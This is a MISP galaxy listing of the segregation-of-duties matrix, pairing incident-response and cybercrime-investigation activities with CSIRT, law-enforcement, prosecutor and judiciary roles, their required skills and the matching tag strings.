The tag is: misp-galaxy:sod-matrix="Collecting cyber threat intelligence - CSIRT - [C]"
Collecting cyber threat intelligence - CSIRT - [I]
Knowledge of cyber threat intelligence landscape
The tag is: misp-galaxy:sod-matrix="Collecting cyber threat intelligence - CSIRT - [I]"

Collecting cyber threat intelligence - CSIRT - [S]
Knowledge of cyber threat intelligence landscape
The tag is: misp-galaxy:sod-matrix="Collecting cyber threat intelligence - CSIRT - [S]"

Collecting cyber threat intelligence - LEA - [R]
Knowledge of cyber threat intelligence landscape
The tag is: misp-galaxy:sod-matrix="Collecting cyber threat intelligence - LEA - [R]"

Collecting cyber threat intelligence - LEA - [C]
Knowledge of cyber threat intelligence landscape
The tag is: misp-galaxy:sod-matrix="Collecting cyber threat intelligence - LEA - [C]"

Collecting cyber threat intelligence - LEA - [I]
Knowledge of cyber threat intelligence landscape
The tag is: misp-galaxy:sod-matrix="Collecting cyber threat intelligence - LEA - [I]"

Collecting cyber threat intelligence - LEA - [S]
Knowledge of cyber threat intelligence landscape
The tag is: misp-galaxy:sod-matrix="Collecting cyber threat intelligence - LEA - [S]"

Collecting cyber threat intelligence - Prosecutors - [R]
Knowledge of cyber threat intelligence landscape
The tag is: misp-galaxy:sod-matrix="Collecting cyber threat intelligence - Prosecutors - [R]"

Collecting cyber threat intelligence - Prosecutors - [C]
Knowledge of cyber threat intelligence landscape
The tag is: misp-galaxy:sod-matrix="Collecting cyber threat intelligence - Prosecutors - [C]"
Collecting cyber threat intelligence - Prosecutors - [I]
Knowledge of cyber threat intelligence landscape
The tag is: misp-galaxy:sod-matrix="Collecting cyber threat intelligence - Prosecutors - [I]"

Collecting cyber threat intelligence - Prosecutors - [S]
Knowledge of cyber threat intelligence landscape
The tag is: misp-galaxy:sod-matrix="Collecting cyber threat intelligence - Prosecutors - [S]"

Analysis of vulnerabilities and threats - CSIRT - [R]
Development and distribution of tools for preventive and reactive mitigation
The tag is: misp-galaxy:sod-matrix="Analysis of vulnerabilities and threats - CSIRT - [R]"

Analysis of vulnerabilities and threats - CSIRT - [C]
Development and distribution of tools for preventive and reactive mitigation
The tag is: misp-galaxy:sod-matrix="Analysis of vulnerabilities and threats - CSIRT - [C]"

Analysis of vulnerabilities and threats - CSIRT - [I]
Development and distribution of tools for preventive and reactive mitigation
The tag is: misp-galaxy:sod-matrix="Analysis of vulnerabilities and threats - CSIRT - [I]"

Analysis of vulnerabilities and threats - CSIRT - [S]
Development and distribution of tools for preventive and reactive mitigation
The tag is: misp-galaxy:sod-matrix="Analysis of vulnerabilities and threats - CSIRT - [S]"

Analysis of vulnerabilities and threats - LEA - [R]
Development and distribution of tools for preventive and reactive mitigation
The tag is: misp-galaxy:sod-matrix="Analysis of vulnerabilities and threats - LEA - [R]"

Analysis of vulnerabilities and threats - LEA - [C]
Development and distribution of tools for preventive and reactive mitigation
The tag is: misp-galaxy:sod-matrix="Analysis of vulnerabilities and threats - LEA - [C]"
Analysis of vulnerabilities and threats - LEA - [I]
Development and distribution of tools for preventive and reactive mitigation
The tag is: misp-galaxy:sod-matrix="Analysis of vulnerabilities and threats - LEA - [I]"

Analysis of vulnerabilities and threats - LEA - [S]
Development and distribution of tools for preventive and reactive mitigation
The tag is: misp-galaxy:sod-matrix="Analysis of vulnerabilities and threats - LEA - [S]"

Analysis of vulnerabilities and threats - Prosecutors - [R]
Development and distribution of tools for preventive and reactive mitigation
The tag is: misp-galaxy:sod-matrix="Analysis of vulnerabilities and threats - Prosecutors - [R]"

Analysis of vulnerabilities and threats - Prosecutors - [C]
Development and distribution of tools for preventive and reactive mitigation
The tag is: misp-galaxy:sod-matrix="Analysis of vulnerabilities and threats - Prosecutors - [C]"

Analysis of vulnerabilities and threats - Prosecutors - [I]
Development and distribution of tools for preventive and reactive mitigation
The tag is: misp-galaxy:sod-matrix="Analysis of vulnerabilities and threats - Prosecutors - [I]"

Analysis of vulnerabilities and threats - Prosecutors - [S]
Development and distribution of tools for preventive and reactive mitigation
The tag is: misp-galaxy:sod-matrix="Analysis of vulnerabilities and threats - Prosecutors - [S]"

Issuing recommendations for new vulnerabilities and threats - CSIRT - [R]
Dealing with specific types of threats and vulnerabilities
Issuing recommendations for new vulnerabilities and threats - CSIRT - [C]
Dealing with specific types of threats and vulnerabilities

Issuing recommendations for new vulnerabilities and threats - CSIRT - [I]
Dealing with specific types of threats and vulnerabilities

Issuing recommendations for new vulnerabilities and threats - CSIRT - [S]
Dealing with specific types of threats and vulnerabilities

Advising potential victims on preventive measures against cybercrime - CSIRT - [R]
Raising awareness on preventive measures against cybercrime

Advising potential victims on preventive measures against cybercrime - CSIRT - [C]
Raising awareness on preventive measures against cybercrime
Advising potential victims on preventive measures against cybercrime - CSIRT - [I]

Raising awareness on preventive measures against cybercrime

The tag is: misp-galaxy:sod-matrix="Advising potential victims on preventive measures against cybercrime - CSIRT - [I]"

Advising potential victims on preventive measures against cybercrime - CSIRT - [S]

Raising awareness on preventive measures against cybercrime

The tag is: misp-galaxy:sod-matrix="Advising potential victims on preventive measures against cybercrime - CSIRT - [S]"

Advising potential victims on preventive measures against cybercrime - LEA - [R]

Raising awareness on preventive measures against cybercrime

The tag is: misp-galaxy:sod-matrix="Advising potential victims on preventive measures against cybercrime - LEA - [R]"

Advising potential victims on preventive measures against cybercrime - LEA - [C]

Raising awareness on preventive measures against cybercrime

The tag is: misp-galaxy:sod-matrix="Advising potential victims on preventive measures against cybercrime - LEA - [C]"

Advising potential victims on preventive measures against cybercrime - LEA - [I]

Raising awareness on preventive measures against cybercrime

The tag is: misp-galaxy:sod-matrix="Advising potential victims on preventive measures against cybercrime - LEA - [I]"

Advising potential victims on preventive measures against cybercrime - LEA - [S]

Raising awareness on preventive measures against cybercrime
The tag is: misp-galaxy:sod-matrix="Advising potential victims on preventive measures against cybercrime - LEA - [S]"

Discovery of the cyber security incident/crime - CSIRT - [R]
Digital investigations; forensics tools; penetration testing; vulnerability scanning; flow analysis
The tag is: misp-galaxy:sod-matrix="Discovery of the cyber security incident/crime - CSIRT - [R]"

Discovery of the cyber security incident/crime - CSIRT - [C]
Digital investigations; forensics tools; penetration testing; vulnerability scanning; flow analysis
The tag is: misp-galaxy:sod-matrix="Discovery of the cyber security incident/crime - CSIRT - [C]"

Discovery of the cyber security incident/crime - CSIRT - [I]
Digital investigations; forensics tools; penetration testing; vulnerability scanning; flow analysis
The tag is: misp-galaxy:sod-matrix="Discovery of the cyber security incident/crime - CSIRT - [I]"

Discovery of the cyber security incident/crime - CSIRT - [S]
Digital investigations; forensics tools; penetration testing; vulnerability scanning; flow analysis
The tag is: misp-galaxy:sod-matrix="Discovery of the cyber security incident/crime - CSIRT - [S]"

Discovery of the cyber security incident/crime - LEA - [R]
Digital investigations; forensics tools; penetration testing; vulnerability scanning; flow analysis
The tag is: misp-galaxy:sod-matrix="Discovery of the cyber security incident/crime - LEA - [R]"

Discovery of the cyber security incident/crime - LEA - [C]
Digital investigations; forensics tools; penetration testing; vulnerability scanning; flow analysis
The tag is: misp-galaxy:sod-matrix="Discovery of the cyber security incident/crime - LEA - [C]"
Discovery of the cyber security incident/crime - LEA - [I]

Digital investigations; forensics tools; penetration testing; vulnerability scanning; flow analysis

The tag is: misp-galaxy:sod-matrix="Discovery of the cyber security incident/crime - LEA - [I]"

Discovery of the cyber security incident/crime - LEA - [S]

Digital investigations; forensics tools; penetration testing; vulnerability scanning; flow analysis

The tag is: misp-galaxy:sod-matrix="Discovery of the cyber security incident/crime - LEA - [S]"

Identification and classification of the cyber security incident/crime - CSIRT - [R]

Incident and crime classification and identification

The tag is: misp-galaxy:sod-matrix="Identification and classification of the cyber security incident/crime - CSIRT - [R]"

Identification and classification of the cyber security incident/crime - CSIRT - [C]

Incident and crime classification and identification

The tag is: misp-galaxy:sod-matrix="Identification and classification of the cyber security incident/crime - CSIRT - [C]"

Identification and classification of the cyber security incident/crime - CSIRT - [I]

Incident and crime classification and identification

The tag is: misp-galaxy:sod-matrix="Identification and classification of the cyber security incident/crime - CSIRT - [I]"

Identification and classification of the cyber security incident/crime - CSIRT - [S]

Incident and crime classification and identification

The tag is: misp-galaxy:sod-matrix="Identification and classification of the cyber security incident/crime - CSIRT - [S]"
Identification and classification of the cyber security incident/crime - LEA - [R]

Incident and crime classification and identification

The tag is: misp-galaxy:sod-matrix="Identification and classification of the cyber security incident/crime - LEA - [R]"

Identification and classification of the cyber security incident/crime - LEA - [C]

Incident and crime classification and identification

The tag is: misp-galaxy:sod-matrix="Identification and classification of the cyber security incident/crime - LEA - [C]"

Identification and classification of the cyber security incident/crime - LEA - [I]

Incident and crime classification and identification

The tag is: misp-galaxy:sod-matrix="Identification and classification of the cyber security incident/crime - LEA - [I]"

Identification and classification of the cyber security incident/crime - LEA - [S]

Incident and crime classification and identification

The tag is: misp-galaxy:sod-matrix="Identification and classification of the cyber security incident/crime - LEA - [S]"

Identification and classification of the cyber security incident/crime - Prosecutors - [R]

Incident and crime classification and identification

The tag is: misp-galaxy:sod-matrix="Identification and classification of the cyber security incident/crime - Prosecutors - [R]"
Identification and classification of the cyber security incident/crime - Prosecutors - [C]

Incident and crime classification and identification

The tag is: misp-galaxy:sod-matrix="Identification and classification of the cyber security incident/crime - Prosecutors - [C]"

Identification and classification of the cyber security incident/crime - Prosecutors - [I]

Incident and crime classification and identification

The tag is: misp-galaxy:sod-matrix="Identification and classification of the cyber security incident/crime - Prosecutors - [I]"

Identification and classification of the cyber security incident/crime - Prosecutors - [S]

Incident and crime classification and identification

The tag is: misp-galaxy:sod-matrix="Identification and classification of the cyber security incident/crime - Prosecutors - [S]"

Identify the type and severity of the compromise - CSIRT - [R]

Knowledge of cyber threats and incident response procedures

The tag is: misp-galaxy:sod-matrix="Identify the type and severity of the compromise - CSIRT - [R]"

Identify the type and severity of the compromise - CSIRT - [C]

Knowledge of cyber threats and incident response procedures

The tag is: misp-galaxy:sod-matrix="Identify the type and severity of the compromise - CSIRT - [C]"

Identify the type and severity of the compromise - CSIRT - [I]

Knowledge of cyber threats and incident response procedures

The tag is: misp-galaxy:sod-matrix="Identify the type and severity of the compromise - CSIRT - [I]"
Identify the type and severity of the compromise - CSIRT - [S]

Knowledge of cyber threats and incident response procedures

The tag is: misp-galaxy:sod-matrix="Identify the type and severity of the compromise - CSIRT - [S]"

Identify the type and severity of the compromise - LEA - [R]

Knowledge of cyber threats and incident response procedures

The tag is: misp-galaxy:sod-matrix="Identify the type and severity of the compromise - LEA - [R]"

Identify the type and severity of the compromise - LEA - [C]

Knowledge of cyber threats and incident response procedures

The tag is: misp-galaxy:sod-matrix="Identify the type and severity of the compromise - LEA - [C]"

Identify the type and severity of the compromise - LEA - [I]

Knowledge of cyber threats and incident response procedures

The tag is: misp-galaxy:sod-matrix="Identify the type and severity of the compromise - LEA - [I]"

Identify the type and severity of the compromise - LEA - [S]

Knowledge of cyber threats and incident response procedures

The tag is: misp-galaxy:sod-matrix="Identify the type and severity of the compromise - LEA - [S]"

Identify the type and severity of the compromise - Prosecutors - [R]

Knowledge of cyber threats and incident response procedures

The tag is: misp-galaxy:sod-matrix="Identify the type and severity of the compromise - Prosecutors - [R]"
Identify the type and severity of the compromise - Prosecutors - [C]

Knowledge of cyber threats and incident response procedures

The tag is: `misp-galaxy:sod-matrix="Identify the type and severity of the compromise - Prosecutors - [C]"

Identify the type and severity of the compromise - Prosecutors - [I]

Knowledge of cyber threats and incident response procedures

The tag is: `misp-galaxy:sod-matrix="Identify the type and severity of the compromise - Prosecutors - [I]"

Identify the type and severity of the compromise - Prosecutors - [S]

Knowledge of cyber threats and incident response procedures

The tag is: `misp-galaxy:sod-matrix="Identify the type and severity of the compromise - Prosecutors - [S]"

Evidence collection - CSIRT - [R]

Knowledge of what kind of data to collect; organisation skills

The tag is: `misp-galaxy:sod-matrix="Evidence collection - CSIRT - [R]"

Evidence collection - CSIRT - [C]

Knowledge of what kind of data to collect; organisation skills

The tag is: `misp-galaxy:sod-matrix="Evidence collection - CSIRT - [C]"

Evidence collection - CSIRT - [I]

Knowledge of what kind of data to collect; organisation skills

The tag is: `misp-galaxy:sod-matrix="Evidence collection - CSIRT - [I]"

Evidence collection - CSIRT - [S]

Knowledge of what kind of data to collect; organisation skills
Evidence collection - LEA - [R]
Knowledge of what kind of data to collect; organisation skills

The tag is: misp-galaxy:sod-matrix="Evidence collection - LEA - [R]"

Evidence collection - LEA - [C]
Knowledge of what kind of data to collect; organisation skills

The tag is: misp-galaxy:sod-matrix="Evidence collection - LEA - [C]"

Evidence collection - LEA - [I]
Knowledge of what kind of data to collect; organisation skills

The tag is: misp-galaxy:sod-matrix="Evidence collection - LEA - [I]"

Evidence collection - LEA - [S]
Knowledge of what kind of data to collect; organisation skills

The tag is: misp-galaxy:sod-matrix="Evidence collection - LEA - [S]"

Evidence collection - Prosecutors - [R]
Knowledge of what kind of data to collect; organisation skills

The tag is: misp-galaxy:sod-matrix="Evidence collection - Prosecutors - [R]"

Evidence collection - Prosecutors - [C]
Knowledge of what kind of data to collect; organisation skills

The tag is: misp-galaxy:sod-matrix="Evidence collection - Prosecutors - [C]"

Evidence collection - Prosecutors - [I]
Knowledge of what kind of data to collect; organisation skills

The tag is: misp-galaxy:sod-matrix="Evidence collection - Prosecutors - [I]"

Evidence collection - Prosecutors - [S]
Knowledge of what kind of data to collect; organisation skills
Providing technical expertise - CSIRT - [R]

Technical skills

Providing technical expertise - CSIRT - [C]

Technical skills

Providing technical expertise - CSIRT - [I]

Technical skills

Providing technical expertise - CSIRT - [S]

Technical skills

Preserving the evidence that may be crucial for the detection of a crime in a criminal trial - CSIRT - [R]

Digital investigations; forensics tools;

Preserving the evidence that may be crucial for the detection of a crime in a criminal trial - CSIRT - [C]

Digital investigations; forensics tools;
Preserving the evidence that may be crucial for the detection of a crime in a criminal trial - CSIRT - [I]

Digital investigations; forensics tools;

The tag is: misp-galaxy:sod-matrix="Preserving the evidence that may be crucial for the detection of a crime in a criminal trial - CSIRT - [I]"

Preserving the evidence that may be crucial for the detection of a crime in a criminal trial - CSIRT - [S]

Digital investigations; forensics tools;

The tag is: misp-galaxy:sod-matrix="Preserving the evidence that may be crucial for the detection of a crime in a criminal trial - CSIRT - [S]"

Preserving the evidence that may be crucial for the detection of a crime in a criminal trial - LEA - [R]

Digital investigations; forensics tools;

The tag is: misp-galaxy:sod-matrix="Preserving the evidence that may be crucial for the detection of a crime in a criminal trial - LEA - [R]"

Preserving the evidence that may be crucial for the detection of a crime in a criminal trial - LEA - [C]

Digital investigations; forensics tools;

The tag is: misp-galaxy:sod-matrix="Preserving the evidence that may be crucial for the detection of a crime in a criminal trial - LEA - [C]"

Preserving the evidence that may be crucial for the detection of a crime in a criminal trial - LEA - [I]

Digital investigations; forensics tools;

The tag is: misp-galaxy:sod-matrix="Preserving the evidence that may be crucial for the detection of a crime in a criminal trial - LEA - [I]"

Preserving the evidence that may be crucial for the detection of a crime in a criminal trial - LEA - [S]

Digital investigations; forensics tools;
Preserving the evidence that may be crucial for the detection of a crime in a criminal trial - Prosecutors - [R]

Digital investigations; forensics tools;

Preserving the evidence that may be crucial for the detection of a crime in a criminal trial - Prosecutors - [C]

Digital investigations; forensics tools;

Preserving the evidence that may be crucial for the detection of a crime in a criminal trial - Prosecutors - [I]

Digital investigations; forensics tools;

Preserving the evidence that may be crucial for the detection of a crime in a criminal trial - Prosecutors - [S]

Digital investigations; forensics tools;
Advising the victim to report / obligation to report a cybercrime to law enforcement (LE) - CSIRT - [R]

Obligations and restriction on information sharing; communication channels

The tag is: misp-galaxy:sod-matrix="Advising the victim to report / obligation to report a cybercrime to law enforcement (LE) - CSIRT - [R]"

Advising the victim to report / obligation to report a cybercrime to law enforcement (LE) - CSIRT - [C]

Obligations and restriction on information sharing; communication channels

The tag is: misp-galaxy:sod-matrix="Advising the victim to report / obligation to report a cybercrime to law enforcement (LE) - CSIRT - [C]"

Advising the victim to report / obligation to report a cybercrime to law enforcement (LE) - CSIRT - [I]

Obligations and restriction on information sharing; communication channels

The tag is: misp-galaxy:sod-matrix="Advising the victim to report / obligation to report a cybercrime to law enforcement (LE) - CSIRT - [I]"

Advising the victim to report / obligation to report a cybercrime to law enforcement (LE) - CSIRT - [S]

Obligations and restriction on information sharing; communication channels

The tag is: misp-galaxy:sod-matrix="Advising the victim to report / obligation to report a cybercrime to law enforcement (LE) - CSIRT - [S]"

Advising the victim to report / obligation to report a cybercrime to law enforcement (LE) - Prosecutors - [R]

Obligations and restriction on information sharing; communication channels

The tag is: misp-galaxy:sod-matrix="Advising the victim to report / obligation to report a cybercrime to law enforcement (LE) - Prosecutors - [R]"

Advising the victim to report / obligation to report a cybercrime to law enforcement (LE) - Prosecutors - [C]

Obligations and restriction on information sharing; communication channels
Advising the victim to report / obligation to report a cybercrime to law enforcement (LE) - Prosecutors - [I]
Obligations and restriction on information sharing; communication channels

Advising the victim to report / obligation to report a cybercrime to law enforcement (LE) - Prosecutors - [S]
Obligations and restriction on information sharing; communication channels

Duty to inform the victim of a cybercrime - CSIRT - [R]
Obligations and restrictions to the information sharing

Duty to inform the victim of a cybercrime - CSIRT - [C]
Obligations and restrictions to the information sharing

Duty to inform the victim of a cybercrime - CSIRT - [I]
Obligations and restrictions to the information sharing

Duty to inform the victim of a cybercrime - CSIRT - [S]
Obligations and restrictions to the information sharing

Duty to inform the victim of a cybercrime - LEA - [R]
Obligations and restrictions to the information sharing
Duty to inform the victim of a cybercrime - LEA - [C]
Obligations and restrictions to the information sharing

Duty to inform the victim of a cybercrime - LEA - [I]
Obligations and restrictions to the information sharing

Duty to inform the victim of a cybercrime - LEA - [S]
Obligations and restrictions to the information sharing

Duty to inform the victim of a cybercrime - Prosecutors - [R]
Obligations and restrictions to the information sharing

Duty to inform the victim of a cybercrime - Prosecutors - [C]
Obligations and restrictions to the information sharing

Duty to inform the victim of a cybercrime - Prosecutors - [I]
Obligations and restrictions to the information sharing

Duty to inform the victim of a cybercrime - Prosecutors - [S]
Obligations and restrictions to the information sharing
Duty to inform other stakeholders/authorities (operators of vulnerable systems, data protection authorities, telecommunications authorities, etc.) - CSIRT - [R]

Obligations and rules for information sharing among communities

Duty to inform other stakeholders/authorities (operators of vulnerable systems, data protection authorities, telecommunications authorities, etc.) - CSIRT - [C]

Obligations and rules for information sharing among communities

Duty to inform other stakeholders/authorities (operators of vulnerable systems, data protection authorities, telecommunications authorities, etc.) - CSIRT - [I]

Obligations and rules for information sharing among communities

Duty to inform other stakeholders/authorities (operators of vulnerable systems, data protection authorities, telecommunications authorities, etc.) - CSIRT - [S]

Obligations and rules for information sharing among communities
Acting as a single point of contact (PoC) for any communication with other EU Member States for the incident handling - CSIRT - [R]

Communication skills; communication channel

The tag is: `misp-galaxy:sod-matrix="Acting as a single point of contact (PoC) for any communication with other EU Member States for the incident handling - CSIRT - [R]"`

Acting as a single point of contact (PoC) for any communication with other EU Member States for the incident handling - CSIRT - [C]

Communication skills; communication channel

The tag is: `misp-galaxy:sod-matrix="Acting as a single point of contact (PoC) for any communication with other EU Member States for the incident handling - CSIRT - [C]"`

Acting as a single point of contact (PoC) for any communication with other EU Member States for the incident handling - CSIRT - [I]

Communication skills; communication channel

The tag is: `misp-galaxy:sod-matrix="Acting as a single point of contact (PoC) for any communication with other EU Member States for the incident handling - CSIRT - [I]"`

Acting as a single point of contact (PoC) for any communication with other EU Member States for the incident handling - CSIRT - [S]

Communication skills; communication channel

The tag is: `misp-galaxy:sod-matrix="Acting as a single point of contact (PoC) for any communication with other EU Member States for the incident handling - CSIRT - [S]"`

Mitigation of an incident - CSIRT - [R]

Well-prepared & well-organised to react promptly in an incident

The tag is: `misp-galaxy:sod-matrix="Mitigation of an incident - CSIRT - [R]"`
Mitigation of an incident - CSIRT - [C]
Well-prepared & well-organised to react promptly in an incident
The tag is: misp-galaxy:sod-matrix="Mitigation of an incident - CSIRT - [C]"

Mitigation of an incident - CSIRT - [I]
Well-prepared & well-organised to react promptly in an incident
The tag is: misp-galaxy:sod-matrix="Mitigation of an incident - CSIRT - [I]"

Mitigation of an incident - CSIRT - [S]
Well-prepared & well-organised to react promptly in an incident
The tag is: misp-galaxy:sod-matrix="Mitigation of an incident - CSIRT - [S]"

Conducting the criminal investigation - LEA - [R]
Knowledge of the legal framework; decision-making skills
The tag is: misp-galaxy:sod-matrix="Conducting the criminal investigation - LEA - [R]"

Conducting the criminal investigation - LEA - [C]
Knowledge of the legal framework; decision-making skills
The tag is: misp-galaxy:sod-matrix="Conducting the criminal investigation - LEA - [C]"

Conducting the criminal investigation - LEA - [I]
Knowledge of the legal framework; decision-making skills
The tag is: misp-galaxy:sod-matrix="Conducting the criminal investigation - LEA - [I]"

Conducting the criminal investigation - LEA - [S]
Knowledge of the legal framework; decision-making skills
The tag is: misp-galaxy:sod-matrix="Conducting the criminal investigation - LEA - [S]"

Conducting the criminal investigation - Prosecutors - [R]
Knowledge of the legal framework; decision-making skills
Conducting the criminal investigation - Prosecutors - [C]
Knowledge of the legal framework; decision-making skills

Conducting the criminal investigation - Prosecutors - [I]
Knowledge of the legal framework; decision-making skills

Conducting the criminal investigation - Prosecutors - [S]
Knowledge of the legal framework; decision-making skills

Leading the criminal investigation - Judiciary - [R]
Knowledge of the incident response plan; leadership skills

Leading the criminal investigation - Judiciary - [C]
Knowledge of the incident response plan; leadership skills

Leading the criminal investigation - Judiciary - [I]
Knowledge of the incident response plan; leadership skills

Leading the criminal investigation - Judiciary - [S]
Knowledge of the incident response plan; leadership skills
Leading the criminal investigation - Prosecutors - [R]
Knowledge of the incident response plan; leadership skills
The tag is: misp-galaxy:sod-matrix="Leading the criminal investigation - Prosecutors - [R]"

Leading the criminal investigation - Prosecutors - [C]
Knowledge of the incident response plan; leadership skills
The tag is: misp-galaxy:sod-matrix="Leading the criminal investigation - Prosecutors - [C]"

Leading the criminal investigation - Prosecutors - [I]
Knowledge of the incident response plan; leadership skills
The tag is: misp-galaxy:sod-matrix="Leading the criminal investigation - Prosecutors - [I]"

Leading the criminal investigation - Prosecutors - [S]
Knowledge of the incident response plan; leadership skills
The tag is: misp-galaxy:sod-matrix="Leading the criminal investigation - Prosecutors - [S]"

In the case of disagreement, the final say for an investigation - Judiciary - [R]
Knowledge of the legal framework; decision-making skills
The tag is: misp-galaxy:sod-matrix="In the case of disagreement, the final say for an investigation - Judiciary - [R]"

In the case of disagreement, the final say for an investigation - Judiciary - [C]
Knowledge of the legal framework; decision-making skills
The tag is: misp-galaxy:sod-matrix="In the case of disagreement, the final say for an investigation - Judiciary - [C]"

In the case of disagreement, the final say for an investigation - Judiciary - [I]
Knowledge of the legal framework; decision-making skills
The tag is: misp-galaxy:sod-matrix="In the case of disagreement, the final say for an investigation -
In the case of disagreement, the final say for an investigation - Judiciary - [S]
Knowledge of the legal framework; decision-making skills
The tag is: misp-galaxy:sod-matrix="In the case of disagreement, the final say for an investigation - Judiciary - [S]"

In the case of disagreement, the final say for an investigation - Prosecutors - [R]
Knowledge of the legal framework; decision-making skills
The tag is: misp-galaxy:sod-matrix="In the case of disagreement, the final say for an investigation - Prosecutors - [R]"

In the case of disagreement, the final say for an investigation - Prosecutors - [C]
Knowledge of the legal framework; decision-making skills
The tag is: misp-galaxy:sod-matrix="In the case of disagreement, the final say for an investigation - Prosecutors - [C]"

In the case of disagreement, the final say for an investigation - Prosecutors - [I]
Knowledge of the legal framework; decision-making skills
The tag is: misp-galaxy:sod-matrix="In the case of disagreement, the final say for an investigation - Prosecutors - [I]"

In the case of disagreement, the final say for an investigation - Prosecutors - [S]
Knowledge of the legal framework; decision-making skills
The tag is: misp-galaxy:sod-matrix="In the case of disagreement, the final say for an investigation - Prosecutors - [S]"
Authorizing the investigation carried out by the LE - LEA - [R]

Decision-making in the criminal procedure

The tag is: misp-galaxy:sod-matrix="Authorizing the investigation carried out by the LE - LEA - [R]"

Authorizing the investigation carried out by the LE - LEA - [C]

Decision-making in the criminal procedure

The tag is: misp-galaxy:sod-matrix="Authorizing the investigation carried out by the LE - LEA - [C]"

Authorizing the investigation carried out by the LE - LEA - [I]

Decision-making in the criminal procedure

The tag is: misp-galaxy:sod-matrix="Authorizing the investigation carried out by the LE - LEA - [I]"

Authorizing the investigation carried out by the LE - LEA - [S]

Decision-making in the criminal procedure

The tag is: misp-galaxy:sod-matrix="Authorizing the investigation carried out by the LE - LEA - [S]"

Authorizing the investigation carried out by the LE - Judiciary - [R]

Decision-making in the criminal procedure

The tag is: misp-galaxy:sod-matrix="Authorizing the investigation carried out by the LE - Judiciary - [R]"

Authorizing the investigation carried out by the LE - Judiciary - [C]

Decision-making in the criminal procedure

The tag is: misp-galaxy:sod-matrix="Authorizing the investigation carried out by the LE - Judiciary - [C]"
Authorizing the investigation carried out by the LE - Judiciary - [I]

Decision-making in the criminal procedure

The tag is: misp-galaxy:sod-matrix="Authorizing the investigation carried out by the LE - Judiciary - [I]"

Authorizing the investigation carried out by the LE - Judiciary - [S]

Decision-making in the criminal procedure

The tag is: misp-galaxy:sod-matrix="Authorizing the investigation carried out by the LE - Judiciary - [S]"

Authorizing the investigation carried out by the LE - Prosecutors - [R]

Decision-making in the criminal procedure

The tag is: misp-galaxy:sod-matrix="Authorizing the investigation carried out by the LE - Prosecutors - [R]"

Authorizing the investigation carried out by the LE - Prosecutors - [C]

Decision-making in the criminal procedure

The tag is: misp-galaxy:sod-matrix="Authorizing the investigation carried out by the LE - Prosecutors - [C]"

Authorizing the investigation carried out by the LE - Prosecutors - [I]

Decision-making in the criminal procedure

The tag is: misp-galaxy:sod-matrix="Authorizing the investigation carried out by the LE - Prosecutors - [I]"

Authorizing the investigation carried out by the LE - Prosecutors - [S]

Decision-making in the criminal procedure
Ensuring that fundamental rights are respected during the investigation and prosecution - CSIRT - [R]

Fundamental rights in criminal investigations and prosecutions

Ensuring that fundamental rights are respected during the investigation and prosecution - CSIRT - [C]

Fundamental rights in criminal investigations and prosecutions

Ensuring that fundamental rights are respected during the investigation and prosecution - CSIRT - [I]

Fundamental rights in criminal investigations and prosecutions

Ensuring that fundamental rights are respected during the investigation and prosecution - CSIRT - [S]

Fundamental rights in criminal investigations and prosecutions

Ensuring that fundamental rights are respected during the investigation and prosecution - LEA - [R]

Fundamental rights in criminal investigations and prosecutions

The tag is: misp-galaxy:sod-matrix="Authorizing the investigation carried out by the LE - Prosecutors - [S]"

The tag is: misp-galaxy:sod-matrix="Ensuring that fundamental rights are respected during the investigation and prosecution - CSIRT - [R]"

The tag is: misp-galaxy:sod-matrix="Ensuring that fundamental rights are respected during the investigation and prosecution - CSIRT - [C]"

The tag is: misp-galaxy:sod-matrix="Ensuring that fundamental rights are respected during the investigation and prosecution - CSIRT - [I]"

The tag is: misp-galaxy:sod-matrix="Ensuring that fundamental rights are respected during the investigation and prosecution - CSIRT - [S]"

The tag is: misp-galaxy:sod-matrix="Ensuring that fundamental rights are respected during the investigation and prosecution - LEA - [R]"
Ensuring that fundamental rights are respected during the investigation and prosecution - LEA - [C]

Fundamental rights in criminal investigations and prosecutions

The tag is: misp-galaxy:sod-matrix="Ensuring that fundamental rights are respected during the investigation and prosecution - LEA - [C]"

Ensuring that fundamental rights are respected during the investigation and prosecution - LEA - [I]

Fundamental rights in criminal investigations and prosecutions

The tag is: misp-galaxy:sod-matrix="Ensuring that fundamental rights are respected during the investigation and prosecution - LEA - [I]"

Ensuring that fundamental rights are respected during the investigation and prosecution - LEA - [S]

Fundamental rights in criminal investigations and prosecutions

The tag is: misp-galaxy:sod-matrix="Ensuring that fundamental rights are respected during the investigation and prosecution - LEA - [S]"

Ensuring that fundamental rights are respected during the investigation and prosecution - Judiciary - [R]

Fundamental rights in criminal investigations and prosecutions

The tag is: misp-galaxy:sod-matrix="Ensuring that fundamental rights are respected during the investigation and prosecution - Judiciary - [R]"

Ensuring that fundamental rights are respected during the investigation and prosecution - Judiciary - [C]

Fundamental rights in criminal investigations and prosecutions

The tag is: misp-galaxy:sod-matrix="Ensuring that fundamental rights are respected during the investigation and prosecution - Judiciary - [C]"
Ensuring that fundamental rights are respected during the investigation and prosecution - Judiciary - [I]

Fundamental rights in criminal investigations and prosecutions

The tag is: misp-galaxy:sod-matrix="Ensuring that fundamental rights are respected during the investigation and prosecution - Judiciary - [I]"

Ensuring that fundamental rights are respected during the investigation and prosecution - Judiciary - [S]

Fundamental rights in criminal investigations and prosecutions

The tag is: misp-galaxy:sod-matrix="Ensuring that fundamental rights are respected during the investigation and prosecution - Judiciary - [S]"

Ensuring that fundamental rights are respected during the investigation and prosecution - Prosecutors - [R]

Fundamental rights in criminal investigations and prosecutions

The tag is: misp-galaxy:sod-matrix="Ensuring that fundamental rights are respected during the investigation and prosecution - Prosecutors - [R]"

Ensuring that fundamental rights are respected during the investigation and prosecution - Prosecutors - [C]

Fundamental rights in criminal investigations and prosecutions

The tag is: misp-galaxy:sod-matrix="Ensuring that fundamental rights are respected during the investigation and prosecution - Prosecutors - [C]"

Ensuring that fundamental rights are respected during the investigation and prosecution - Prosecutors - [I]

Fundamental rights in criminal investigations and prosecutions

The tag is: misp-galaxy:sod-matrix="Ensuring that fundamental rights are respected during the investigation and prosecution - Prosecutors - [I]"
Ensuring that fundamental rights are respected during the investigation and prosecution - Prosecutors - [S]

Fundamental rights in criminal investigations and prosecutions

Systems recovery - CSIRT - [R]

Technical skills

Systems recovery - CSIRT - [C]

Technical skills

Systems recovery - CSIRT - [I]

Technical skills

Systems recovery - CSIRT - [S]

Technical skills

Protecting the constituency - CSIRT - [R]

Drafting and establishing procedures; technical knowledge

Protecting the constituency - CSIRT - [C]

Drafting and establishing procedures; technical knowledge
Protecting the constituency - CSIRT - [I]

Drafting and establishing procedures; technical knowledge

Protecting the constituency - CSIRT - [S]

Drafting and establishing procedures; technical knowledge

